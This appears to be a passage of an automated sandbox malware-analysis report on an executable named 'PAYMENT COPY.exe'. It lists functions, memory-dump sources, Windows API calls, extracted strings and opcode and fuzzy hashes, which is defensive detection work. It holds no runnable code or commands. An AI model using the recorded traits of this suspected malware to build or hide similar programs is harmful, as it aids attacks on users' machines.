Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4a82420709c5c9757fbea4b0586250536c173034cf6c37d0bdfc235456df7efc
Instruction ID: 936968b33077cbc436a19671e647bc4201865acbf63166a7e964ccf7dbaaf97c
Opcode Fuzzy Hash: 4a82420709c5c9757fbea4b0586250536c173034cf6c37d0bdfc235456df7efc
Instruction Fuzzy Hash: 481106B5800749DFDB20DF9AD888BDEBFF8EB48310F248419E555A7650C375A984CFA1

Function 06DB6058 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DBA7F5

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a2997526dad8c1d7e56cc482937a6690af72fed6a588809846838e8a62015fee
Instruction ID: 07042ffbb70396cff3c53f4c4994a8ce3ab8013863babbfca412f9f02c884e79
Opcode Fuzzy Hash: a2997526dad8c1d7e56cc482937a6690af72fed6a588809846838e8a62015fee
Instruction Fuzzy Hash: D71125B5800348DFDB60DF9AD884BDEBBF8EB48310F148459E519A3250C375A944CFA1

Function 0111AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0111AF3E

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5a622717150c3a6223f115d19c507554c35c548232f033a5a7056652d4257f30
Instruction ID: f72627e447db85ec2088acfbda9e732bd142236e6736b8e9bc7609852fccab09
Opcode Fuzzy Hash: 5a622717150c3a6223f115d19c507554c35c548232f033a5a7056652d4257f30
Instruction Fuzzy Hash: 72110FB6C006498FDB14CF9AD444B9EFBF4AF88324F10852AD529B7254C379A545CFA2

Function 00FAD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529549099.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e039a33d849856f8af6df55d8cabafd18089795c474d22f83425c66db02c8027
Instruction ID: a83c2ab03833db332e0688ebf62769572e47f2c6bde009aa587b0ad5a659c534
Opcode Fuzzy Hash: e039a33d849856f8af6df55d8cabafd18089795c474d22f83425c66db02c8027
Instruction Fuzzy Hash: 85216AF6900204DFDB04DF14D9C0F26BF65FB89328F28C569E8060B656C336D846EBA1

Function 010CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2531016861.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca1be106240d9ef8c4ee3d010cf4a18f33af8c899236b47c8674d2313acd5b0
Instruction ID: 7266c7c037843c8ace0c0a81a5577a97dc757291ff3a25a8966e8780ffbc2fde
Opcode Fuzzy Hash: eca1be106240d9ef8c4ee3d010cf4a18f33af8c899236b47c8674d2313acd5b0
Instruction Fuzzy Hash: 13210375504204DFDB15DF58D580B1ABBA1EB84B54F34C5BDE98A0B252C336D447CFA1

Function 010CD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2531016861.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10cd000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59386135f4b33a439d1a1bccce4f690edbcc9bad36cfe54597d8c5310e599101
Instruction ID: 3d5e8faab678b811b8a033af1113f65836ec218fb7f01653a0813b6d1fb0a635
Opcode Fuzzy Hash: 59386135f4b33a439d1a1bccce4f690edbcc9bad36cfe54597d8c5310e599101
Instruction Fuzzy Hash: 262195755083849FCB03CF58D994715BFB1EB46314F25C5EAD8898F2A7C33A9806CBA2

Function 00FAD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529549099.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abce57805455fbad13e0e183dbad104b38b4f6e941f47554a424b7e7f7ae1c1d
Instruction ID: 1a9f61737c4c0573f5b182394c332e70cd08cc90ada3ec648938f9eb67213ea2
Opcode Fuzzy Hash: abce57805455fbad13e0e183dbad104b38b4f6e941f47554a424b7e7f7ae1c1d
Instruction Fuzzy Hash: 3311E9B6D04244CFCB15CF14D5C4B16BF71FB84324F28C6A9D8460B656C336D456DB91

Function 00FAD759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529549099.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f5980d67d0b8eef457ad52e183b72c24ae0cc79a91ab0963a7f573c2cea678
Instruction ID: b94e341ad8816e7edf593ed665ef73fdc3f88002c546ae4e08ed6a73770ec7a3
Opcode Fuzzy Hash: c7f5980d67d0b8eef457ad52e183b72c24ae0cc79a91ab0963a7f573c2cea678
Instruction Fuzzy Hash: 3A012BB1404300DBE7244B15CC84B66FFA8EF42334F18C51AED0A4E686C339A840D671

Function 00FAD758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2529549099.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fad000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0118cb9dc2a6e4d675868f75518dd78b64e0aa64f5c37066d9ee9852b2900751
Instruction ID: 15fe46e0dace023a5393049946a0a278d756039bc06b357777722d2175ee0830
Opcode Fuzzy Hash: 0118cb9dc2a6e4d675868f75518dd78b64e0aa64f5c37066d9ee9852b2900751
Instruction Fuzzy Hash: 48F0CDB1405344AEE7248B0ACC84B62FBA8EF91734F18C55AED095B686C379A844CAB1

Non-executed Functions

Function 06DBC1B0 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dad37b0b1b8b2a1b5e05fe2cf8674f2f18e7cc4e04eb6db90f884921883cbad
Instruction ID: f31a3b6a3bd70a3961a22c2be98fe7a57d00388e8b5eebd610e68c80386f05a2
Opcode Fuzzy Hash: 2dad37b0b1b8b2a1b5e05fe2cf8674f2f18e7cc4e04eb6db90f884921883cbad
Instruction Fuzzy Hash: E1D1DD30B01605CFDBA9DB75C860BAEBBF6AF89604F14446ED146CB298CF35E901CB60

Function 06DB4EC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a402fbcab1b7192b4a8b0839ae159b8ed13b52bfbc2066dd3b658ffd14c9103f
Instruction ID: c683abb4ad488d0bedc977b71d9c36d1236eed384a1c649b4e77cb18ee65c4a5
Opcode Fuzzy Hash: a402fbcab1b7192b4a8b0839ae159b8ed13b52bfbc2066dd3b658ffd14c9103f
Instruction Fuzzy Hash: 1AE1D774E00219CFDB14DFA9D580AAEBBF2FF89304F248169D415AB359D771A942CFA0

Function 06DB2FB0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8808fd330630117379188789375bed2c6ca1467b2046799624e1d36145e355c6
Instruction ID: 32801e3fbb01695273ac5c22af95e939e64dbe304e0d39e0263471a0f21dda97
Opcode Fuzzy Hash: 8808fd330630117379188789375bed2c6ca1467b2046799624e1d36145e355c6
Instruction Fuzzy Hash: 04E1D874E00219CFDB54DFA9C5809AEBBF2FF89304F248169D415AB359DB31A942DFA0

Function 06DB33E8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a22941ee8fae6e0309a6ff3a7f74a780534c09978fac00d061eae4baee54bc
Instruction ID: 03715b014381764e75642ecba10e722543d1db6dd95df333bd7a7efad93707af
Opcode Fuzzy Hash: d4a22941ee8fae6e0309a6ff3a7f74a780534c09978fac00d061eae4baee54bc
Instruction Fuzzy Hash: 94E1E574E00219CFDB14DFA9C580AAEBBF2FF89304F248169D415AB359D731A942DFA1

Function 06DB5878 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d2256c8dd0a145b7311ebc46a1192ec1d2ace0706f33fa5b3b87ca06f9db15
Instruction ID: 59ea13e8d011ad2aee031864ce3c55da40655ccf2ef1c3a35d56600bdd8b28ee
Opcode Fuzzy Hash: 87d2256c8dd0a145b7311ebc46a1192ec1d2ace0706f33fa5b3b87ca06f9db15
Instruction Fuzzy Hash: A2E1D674E00219CFDB54DFA9D580AAEBBF2FF89304F248169D415AB359D731A942CFA0

Function 06DB3820 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51808e02d0cb12a2497c0e74884f094cec320ab93ff588a6ce5ddcc264c30cfd
Instruction ID: 6c2ad22aeb98a8dcbeb453e361a9927433ca1b0a58b0a25158aedfe3cb75aaa0
Opcode Fuzzy Hash: 51808e02d0cb12a2497c0e74884f094cec320ab93ff588a6ce5ddcc264c30cfd
Instruction Fuzzy Hash: EFE1F674E00219CFDB14DFA9C580AAEFBB2FF89304F248169D455AB359D731A942DFA0

Function 0111D4FC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2531911791.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c10d23107986c29778755efcef5f9787af5b4176e978eb1a5116bcec0cdd39f
Instruction ID: 8cc200e44c0b8ef160bb6bc99bf3028cd35964d8b841edf8a47a2b85dc361ba3
Opcode Fuzzy Hash: 5c10d23107986c29778755efcef5f9787af5b4176e978eb1a5116bcec0cdd39f
Instruction Fuzzy Hash: A5A16032E006168FCF09DFB4C84459EFBB2FF85304B15857AE905AB269DB71D91ACB50

Function 06DB2F91 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2541425942.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6db0000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4cf67ceeed135e758328ac1700945e68699e9521795f72ba824f4517e10ea1
Instruction ID: 125faa2590193c11d26466b9943d3328a7917e301e705f849952fa04f71c8108
Opcode Fuzzy Hash: 1b4cf67ceeed135e758328ac1700945e68699e9521795f72ba824f4517e10ea1
Instruction Fuzzy Hash: 8F512C70E042598FDB14CFA9C5849AEFBF2FF89304F2481A9D459A7319D7319942CFA1

Analysis Process: PAYMENT COPY.exePID: 6256, Parent PID: 6764COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	5%
Signature Coverage:	7.9%
Total number of Nodes:	139
Total number of Limit Nodes:	10

Executed Functions

Function 00417F13 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F85

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 903047d8e1bdbf35d3e8a14d87945afa77ef21091bb082e63ca659c846db60c9
Instruction ID: f394c38bedf1b4dc3a459f07bd05b3a1b850caf3ddc90ad2d243d238f59f4bef
Opcode Fuzzy Hash: 903047d8e1bdbf35d3e8a14d87945afa77ef21091bb082e63ca659c846db60c9
Instruction Fuzzy Hash: 4C014CB5E4020DABDB10DAE5DC42FDEB378AB14308F0041AAF90897240F634EB498B95

Function 0042B933 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B96A

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction ID: e0342fce8ca80b502e4f1c7c301b713195f7d66e5fe963ecf1af1ebcabcee691
Opcode Fuzzy Hash: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction Fuzzy Hash: A1E086722002147BD220FB5ADC41F9B779CEFC5714F104019FA4C67182C674B90087F5

Function 01502B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01502B6A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f3b7861a92947e4f568979ea5502007efdf270d2ab4c3ff64c57e9d377933fd4
Instruction ID: 0e53ccb2f9b95269dfd7b33d225970220be661f656a904cfa55b27325264fe53
Opcode Fuzzy Hash: f3b7861a92947e4f568979ea5502007efdf270d2ab4c3ff64c57e9d377933fd4
Instruction Fuzzy Hash: 4390026224240003511671584414616504AA7E1211F59C821E1014990DC66589916225

Function 01502DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01502DFA

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cdb02021cdf32640a3aa87d2a18da57a16b523e375d435e986bc13b8103a6f7
Instruction ID: 4d1113bce3d1771224296ddc037661e9a56e995259814eddc1e92957f7155f7f
Opcode Fuzzy Hash: 9cdb02021cdf32640a3aa87d2a18da57a16b523e375d435e986bc13b8103a6f7
Instruction Fuzzy Hash: 4490023224140413E122715845047071049A7D1251F99CC12A0424958DD7968A52A221

Function 01502C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01502C7A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b93cf5283c7e7cf24ce225ee034a4db42e0ac5425c81d38a93b334cc0a55f69
Instruction ID: f155f255728c1ac15c94142ca699fc095d67ddac5dc78648c16fd9f39c2ca4b5
Opcode Fuzzy Hash: 2b93cf5283c7e7cf24ce225ee034a4db42e0ac5425c81d38a93b334cc0a55f69
Instruction Fuzzy Hash: 8290023224148803E1217158840474A1045A7D1311F5DCC11A4424A58DC7D589917221

Function 015035C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 015035CA

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ea96b789e0ca78570cbd68126a2de68919bc7953d93d91962a80d50796b4197
Instruction ID: b3655c786623ce2bdeab39936919d6a9ec281efb8daca189772a84cc5183dbef
Opcode Fuzzy Hash: 3ea96b789e0ca78570cbd68126a2de68919bc7953d93d91962a80d50796b4197
Instruction Fuzzy Hash: 0C90023264550403E111715845147062045A7D1211F69CC11A0424968DC7D58A5166A2

Function 00414495 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 004145ED

Strings

4jm-6-hL7, xrefs: 004145E0, 004145EC, 004145FD
4jm-6-hL7, xrefs: 004145F4, 004145F7

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 087dfba81afff21d9380da04da7fa1c46135c9628aedd8c36a4be31699d8ef7d
Instruction ID: 70442f200e8d8011eb12d9aa6eab285cefeedc6b5a58ed40d9822e6b0286f80b
Opcode Fuzzy Hash: 087dfba81afff21d9380da04da7fa1c46135c9628aedd8c36a4be31699d8ef7d
Instruction Fuzzy Hash: EE216E71D012587BDB209AA5DC05FEFFF79AF82714F10815AF6406B281D3785907CBA9

Function 004144F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 004145ED

Strings

4jm-6-hL7, xrefs: 004145E0, 004145EC, 004145FD
4jm-6-hL7, xrefs: 004145F4, 004145F7

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 9952c8775ad82d3d14c70ddac2b1d2a02e5af69f2dd1cd68d2dbcd3a209ca98c
Instruction ID: fb19a1285a58bf8b32cc2ec79c68b61a65734ebc7572c323f1429198d429c70d
Opcode Fuzzy Hash: 9952c8775ad82d3d14c70ddac2b1d2a02e5af69f2dd1cd68d2dbcd3a209ca98c
Instruction Fuzzy Hash: 30216B71D05258BBEB209B619C05FEFBF68DF86714F50819EF6002B281D37856078BA9

Function 0041456B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 004145ED

Strings

4jm-6-hL7, xrefs: 004145E0, 004145EC, 004145FD
4jm-6-hL7, xrefs: 004145F4, 004145F7

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: c1901a0c0a11bbbd383fcf4d75cbe00b0ceb55f647e7e4b323219c957e7f12f4
Instruction ID: 08976434c5545f01b2338562f1fdaad6edc1de97ee719280b58dabb22fd6b49c
Opcode Fuzzy Hash: c1901a0c0a11bbbd383fcf4d75cbe00b0ceb55f647e7e4b323219c957e7f12f4
Instruction Fuzzy Hash: 8B110871E41258B6EB209B919C02FEF7B7C9F81B64F01805AFA007B180D6B856068BE9

Function 00414573 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(4jm-6-hL7,00000111,00000000,00000000), ref: 004145ED

Strings

4jm-6-hL7, xrefs: 004145E0, 004145EC, 004145FD
4jm-6-hL7, xrefs: 004145F4, 004145F7

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 4jm-6-hL7$4jm-6-hL7
API String ID: 1836367815-2203199896
Opcode ID: 3ed9c18ea02bf3fbb518a18f418c7553ef6a81daa8d0d111a086c5a63a744cb0
Instruction ID: abc98037a61cbd77267ac9726c087b5a0ddc75a60456b73c38909a03d3c17627
Opcode Fuzzy Hash: 3ed9c18ea02bf3fbb518a18f418c7553ef6a81daa8d0d111a086c5a63a744cb0
Instruction Fuzzy Hash: 43012B71E4121876EB20ABD19C02FDF7B7C9F41B54F008049FA007B2C1D6BC56028BE9

Function 0042BC43 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E6D8,?,?,00000000,?,0041E6D8,?,?,?), ref: 0042BC82

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction ID: 9a8c0dda47c085aa0c0be4bc4ce3348715e1b00423da01913d107ffdd8eef35f
Opcode Fuzzy Hash: 9f05c5da47d2a966b1a53bb4ab017d252cc4b594e74c13755620a5d52c4bf620
Instruction Fuzzy Hash: 18E06DB12002097BD610EE99EC42F9B33ACEFC9710F004019FE08A7281DAB4B910CBF8

Function 0042BC93 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0E54BE0F,00000007,00000000,00000004,00000000,004177F3,000000F4,?,?,?,?,?), ref: 0042BCCF

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d0b09c1f4b93983ed745a2353312e78e600dc49642f4cbf5fae8818ac80d5180
Instruction ID: c3b8e5b80aaeaec908a93ce4109aadd415a91365d5ab4667f736811ecd4b1829
Opcode Fuzzy Hash: d0b09c1f4b93983ed745a2353312e78e600dc49642f4cbf5fae8818ac80d5180
Instruction Fuzzy Hash: 71E06DB1200204BBD610EF59EC41F9B73ACEFC5710F004119FA08A7241DAB5B9108BF4

Function 0042BCE3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,BA4737ED,?,?,BA4737ED), ref: 0042BD17

Memory Dump Source

Source File: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_PAYMENT COPY.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4df4742073d063741ede978df8640e2960793cacb4b608c5ef2a55ff0c610dd4
Instruction ID: f2275c14f5cf01855ec79a4eaf47a634ad2a78c648624f8a0c74b33ea8011654
Opcode Fuzzy Hash: 4df4742073d063741ede978df8640e2960793cacb4b608c5ef2a55ff0c610dd4
Instruction Fuzzy Hash: 6AE04672200214BBD220BB5ADC42F9B776CEFC6714F00401AFA0CAB282C6B4B90187A4

Function 01502C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01502C24

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6ec881b01b1842f8f1ed33c8324acb250184cc8354fb01f0842be893a266cc9
Instruction ID: 8d746ae80a627ed05325f729a8bd68331a25bfe576be3d71b4c243215d3a4fa0
Opcode Fuzzy Hash: f6ec881b01b1842f8f1ed33c8324acb250184cc8354fb01f0842be893a266cc9
Instruction Fuzzy Hash: D3B09B729415C5D6EA13E7A4460C71B794077D1711F1DC465D2030A85F8778C1D1E275

Non-executed Functions

Function 01542349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

FrontEndHeapDebugOptions, xrefs: 01542489
GlobalFlag2, xrefs: 01542FC0
UnloadEventTraceDepth, xrefs: 015424C0
@, xrefs: 01542942
DisableHeapLookaside, xrefs: 0154246D
GlobalFlag, xrefs: 01542F3F, 01543059
MaxLoaderThreads, xrefs: 015424EC
LdrpInitializeExecutionOptions, xrefs: 0154317D
RaiseExceptionOnPossibleDeadlock, xrefs: 01542579
MinimumStackCommitInBytes, xrefs: 01542BB0
UseImpersonatedDeviceMap, xrefs: 0154251C
@, xrefs: 01542B74
ShutdownFlags, xrefs: 015424A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01543176
CFGOptions, xrefs: 01542967
minkernel\ntdll\ldrinit.c, xrefs: 01543187
TracingFlags, xrefs: 01542549
DisableExceptionChainValidation, xrefs: 0154275F
MaxDeadActivationContexts, xrefs: 01542D82
ExecuteOptions, xrefs: 015425A0

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
